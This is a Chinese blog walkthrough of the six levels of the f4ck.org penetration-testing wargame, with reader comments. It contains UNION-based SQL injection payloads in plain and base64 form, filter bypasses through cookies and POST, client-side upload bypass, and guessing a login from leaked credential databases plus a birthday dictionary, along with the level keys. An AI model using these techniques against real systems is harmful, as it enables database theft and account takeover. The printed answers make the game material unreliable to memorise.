正在阅读:

法客论坛渗透游戏攻略视频

149,761

应群里朋友要求做的法客渗透游戏过关攻略视频,其实每一步大家认真研究一下都是能过的。

视频做完才发现法客论坛的客我写错了,不好意思,大家不要介意哦。。法客论坛我没有邀请码,不常去,唉。

第1关

1、http://game.f4ck.org/level1/index.php?id=MQ==

很明显存在SQL注入,我想这关肯定是通过注入得到密码,但是我们再看看……很显然,为了加大一点难道,肯定是过滤了某此字符。而且注入点是id的参数值是通过Base64加密的,我们可以通过sqlmap的base64encode来配合使用,但是因为有过滤,所以不是很方便,经过我的测试,发现使用cookie提交的时候没有过滤。

为了节省时间我这里就不详细的说了,下面已经整理好了。

-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where TABLE_SCHEMA=database()

LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMsNCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCk=

news,pass

-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='pass'

LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSwzLDQgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSdwYXNzJw==

id,thekey

-1 union select 1,thekey,3,4 from pass

LTEgdW5pb24gc2VsZWN0IDEsdGhla2V5LDMsNCBmcm9tIHBhc3M=

the key is => 1c3094d8afa720f79807e578ef7e4530

第2关

2、http://game.f4ck.org/level2/install.php

第二关当时我测试的时候,也是整了半天不明白,到底是哪里可以获取到key,后来仔细的看了一下他提示的文字,新站一般都有些配置方面的问题,于是

congraforyourskill

第3关

3、http://game.f4ck.org/level3/index.php

文件上传,很明显的js验证。

f4ckyoumyphoto

第4关

4、http://game.f4ck.org/level4/index.php

通过查看源代码我们发现了注释的地方有解密函数,通过看变量申明方式,感觉应该是php的,打开神器。http://www.waitalone.cn/phpstorm6.html

vicleo

第5关

5、http://game.f4ck.org/level5/index.php

很明显的,通关的url是那个看起来像一个小马的php文件

下载图片201302130416.png 看源文件

http://game.f4ck.org/level5/Uploadfile/201302135438.php

2013f4ckneedyou

第6关

6、http://game.f4ck.org/level6/login.php

这一关最难过了,虽然一看就知道是要社工,但是不是想象中的那么简单。别问我密码怎么查到的,自己去收集社工库,这个是娃哈哈群里的兄弟帮查的

明明密码查到了呀,为什么不正确呢?因为你忘了别人的女朋友,得到女友生日以后用社工字典生成一系列的密码来后台测试吧,最后成功得到密码

用户名:herolee
密码:herolee03170112

思路:csdn->herolee0317-不对-社工他->法客渗透游戏 herolee->

我是 法客渗透游戏中的 herolee,很爱女朋友。01-12 是我女友的生日,没人给建议。我就自己送了一件礼物。

组合字典herolee03170112

视频教程已经被土豆优酷清理,不好意思。

BY:独自等待 http://www.waitalone.cn/ 感谢法客论坛 http://game.f4ck.org/

目前有:48条访客评论,博主回复38

  1. 小叶
    2013-11-29 21:54

    为什么那个url域名联通报错?

    • 独自等待
      2013-12-02 15:38

      @小叶:因为游戏时间太长了,域名解析被法客论坛停止解析导致的。

  2. 佳少
    2014-01-04 15:55

    我想问你啊,你那个调用程序的工具是什么?有像是QQ啊。

  3. 网吧看车的

    嗯。不错。

  4. Chan
    2014-05-17 21:51

    你好,请问是那个群,我也想做个白帽子,请教一下。

  5. Chan
    2014-05-25 10:36

    大神,我看了一遍基本上是不懂的,真的要向你好好学习,你手上好多神器哟。
    以后要多点来光临你的博客
    __Chan

  6. Chan
    2014-05-25 13:41

    可以告诉我,你用firefox快速返回的插件是什么,就是用鼠标一划就返回了。

    • 独自等待
      2014-05-26 10:09

      @Chan:请参考http://back.waitalone.cn/post/firefoxplugin.html,这个是我收藏的。

      • Chan
        2014-05-26 13:36

        @独自等待:谢谢博主,我看你那个小葵解码器挺好用的,但是我在网上找到的都有backdoor

  7. Brock
    2014-05-28 08:40

    现在好像不行了,修改过了?我用cookie,修改成1′ 不报错
    GET /level1/index.php HTTP/1.1
    Host: game.f4ck.org
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Cookie: id=MSc=
    Cache-Control: max-age=0
    Content-Length: 0

  8. Brock
    2014-05-28 10:22

    域名的net换成org 了

    • 独自等待
      2014-05-28 10:29

      @Brock:我看看。。。

      • Brock
        2014-05-28 10:42

        @独自等待:单引号是会报错,但是过滤所有关键字,包括注释符,不知道怎么利用啊。。。请大侠指点一下!

        • 独自等待
          2014-05-28 17:28

          @Brock:你没有详细看我的文章或者视频?这个注入在cookie里面提交是不拦截的。也许现在改了我不知道。

          • Brock
            2014-05-28 17:29

            @独自等待:现在cookie没用了,只读get参数

            • 独自等待
              2014-05-29 17:19

              @Brock:我看看了告诉你答案。。

              • Brock
                2014-06-21 11:43

                @独自等待:搞不定吗?

                • 独自等待
                  2014-06-21 20:25

                  最近一直在忙 没空看呀兄弟。你看我博客都一个月没有更新了。

  9. 啊毛
    2014-06-26 21:16

    我试过好多次了 cookie好像不行 不知道是不是我方法有问题 求大牛验证

    • 独自等待
      2014-06-27 21:41

      @啊毛:最近太忙了也没有空看,等我有空了再更新一下文章,请关注本文即可。

  10. 有来有去
    2014-09-25 23:19

    第一关和最后一关好像不好使了,最后一关没验证,没有女友生日的提示
    第一关有时间验证一下?

    • 独自等待
      2014-09-26 11:45

      哦这个游戏已经好久不研究了。。。等我有空再研究吧。法客都不能我一个邀请码的。

      • 有来有去
        2014-10-04 18:25

        @独自等待: [/流汗] 第一关搞定了,用POST方式就可以,但是用sqlmap没有成功

        • netpopok
          2014-10-15 16:27

          @有来有去:我用burpsuite改成post方式提交还是过滤啊,是在repeater那里直接改url GET /level1/index.php?id=MQ== HTTP/1.1为POST /level1/index.php?id=MQ== HTTP/1.1吗?

      • 有来有去
        2014-10-04 18:34

        @独自等待:牙卖代,刚刚又好用了,我了个去的,一会我看看第五关

        • 独自等待
          2014-10-05 11:30

          你小子边看牙卖代边日站,果然是个黑客。

        • netpopok
          2014-10-14 07:52

          @有来有去:求教,具体怎么操作的啊?

    • netpopok
      2014-10-15 16:37

      @有来有去:get改成post的方式我已经找到了,但是还是过滤了阿。POST /level1/index.php HTTP/1.1 (中间省略) id=MSBhbmQgMT0x 用1 a n d 1=1还是提示非法关键字

  11. RitzoneX
    2015-02-09 12:22

    打不开游戏地址?
    被墙了?

  12. 过来人
    2016-02-26 18:05

    不想要其他的,只求工具包! [/坏笑]

  13. 豆老板家的猫

    一直没上就过来看看,支持下!毕竟博客不好做,特别是分享精神,交流精神更是值得。

  14. 游客··
    2017-04-05 09:46

    [/坏笑] [/坏笑] [/坏笑]

  15. 山下小豆荚

    我仿佛错过了一个世界,大神,我来晚了 [/流泪] 😭

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌